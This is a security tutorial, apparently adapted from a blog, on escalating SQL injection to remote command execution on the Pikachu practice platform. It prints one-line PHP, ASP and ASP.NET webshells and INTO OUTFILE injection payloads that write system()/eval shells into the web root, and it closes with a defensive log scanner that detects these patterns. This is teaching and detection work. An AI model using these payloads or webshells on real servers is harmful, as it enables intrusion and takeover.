SQL injection to OS remote control, based on the Pikachu test platform

One-line webshell

A one-line webshell is a short, minimal Trojan client. It is built from a function the language provides for executing code inside the language (such as eval) or for running operating system commands (such as system). Writing that single function call into a file on the server and then requesting the file lets whoever sends the request pass in whatever code or command they want, and because the function executes code or operating system commands, the request effectively becomes a remote control channel. It is easy to hide and powerful.
PHP: <?php @eval($_POST['Chopper']); ?>
ASP: <% eval Request("Chopper") %>
ASP.NET: <%@ Page Language="Jscript" %><% eval(Request.Item["chopper"], "unsafe"); %>

Writing malicious code to disk through a SQL injection vulnerability
select 1, 2 into outfile "/var/www/html/1.txt"
The result of the SELECT ... INTO OUTFILE is written to 1.txt in the specified directory.
Some injection points return no output at all; there you can use INTO OUTFILE to write the query result into a file of your choice and then read it by requesting that file.
Prerequisites:
1. You need to know the remote directory (the path of the web root).
2. The database process needs write permission on that remote directory.
3. The database's secure_file_priv setting must allow the write (newer MySQL versions restrict this by default, in which case INTO OUTFILE cannot write anything).

Check the setting in the database:
show global variables like '%secure%';
You can see that secure_file_priv is NULL by default; to allow the write it has to be set to an empty value, which means editing the my.cnf file, adding a secure_file_priv entry with an empty value, and restarting the database service.
The /var/www/html directory also needs to be writable by the database process.
Then construct the payload:
k' union select "<?php @eval($_GET['test']); ?>",2 into outfile "/var/www/html/1.php"#
After submitting it, the front end shows no visible result,
so switch to the server to check whether the file has actually been written.

k' union select "<?php system($_GET['cmd']); ?>",2 into outfile "/var/www/html/2.php"#
PHP's system() function executes operating system commands; here the command is supplied through the GET parameter,
so visiting IP/2.php?cmd=ifconfig returns the server's network interface information.
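A defender-side complement, added here and not part of the original post: a small Python scanner that flags the request pattern described above in web-server access logs (constructed sample lines, URL-encoded the way a browser would send them), plus a check on the secure_file_priv value from my.cnf or SHOW VARIABLES. The path /search.php, the parameter name k, the detection heuristics and the web root /var/www/html are assumptions.

```python
import posixpath
import re
from urllib.parse import unquote_plus
# Constructed sample access-log lines, not from the original post. Line 2 carries the
# post's INTO OUTFILE payload URL-encoded as a browser sends it; line 3 is the follow-up
# request to the dropped file. The path /search.php and parameter name k are assumed.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Mar/2020:10:01:02 +0000] "GET /search.php?k=kobe&submit=Search HTTP/1.1" 200 1532
10.0.0.9 - - [10/Mar/2020:10:03:11 +0000] "GET /search.php?k=k%27+union+select+%22%3C%3Fphp+system%28%24_GET%5B%27cmd%27%5D%29%3B%3F%3E%22%2C2+into+outfile+%22%2Fvar%2Fwww%2Fhtml%2F2.php%22%23 HTTP/1.1" 200 1532
10.0.0.9 - - [10/Mar/2020:10:03:40 +0000] "GET /2.php?cmd=ifconfig HTTP/1.1" 200 880
"""

# Heuristics for this scenario: a UNION ... INTO OUTFILE write carrying PHP code, then webshell-style command parameters on the dropped file.
RULES = {
    "union_select": re.compile(r"\bunion\b[\s/*]+(?:all[\s/*]+)?select\b", re.I),
    "into_outfile": re.compile(r"\binto\s+(?:out|dump)file\b", re.I),
    "php_open_tag": re.compile(r"<\?php", re.I),
    "exec_function": re.compile(r"\b(?:eval|system|exec|passthru|shell_exec)\s*\(", re.I),
    "webshell_param": re.compile(r"[?&](?:cmd|chopper)=", re.I),
}
REQUEST_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def scan_line(line):
    """Rule names matched by one log line; the target is decoded twice to catch double encoding."""
    m = REQUEST_RE.search(line)
    if not m:
        return []
    target = unquote_plus(unquote_plus(m.group("target")))
    return [name for name, rx in RULES.items() if rx.search(target)]

def scan_log(text):
    """Map 1-based line number -> matched rule names, only for lines that hit something."""
    hits = {}
    for n, line in enumerate(text.splitlines(), 1):
        matched = scan_line(line)
        if matched:
            hits[n] = matched
    return hits

def secure_file_priv_is_safe(value, web_root="/var/www/html"):
    """NULL/None disables file export entirely and a directory outside the web root confines it;
    an empty value (what the post sets) lets INTO OUTFILE write anywhere mysqld can write."""
    if value is None:
        return True
    v = value.strip().strip("\"'")
    if v == "":
        return False
    if v.upper() == "NULL":
        return True
    path, root = posixpath.normpath(v), posixpath.normpath(web_root)
    return not (path == root or path.startswith(root + "/"))
```

On the sample above, scan_log(SAMPLE_LOG) flags line 2 (union_select, into_outfile, php_open_tag, exec_function) and line 3 (webshell_param), and secure_file_priv_is_safe("") returns False.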

Source: blog.csdn.net/qq_43499389/article/details/104970500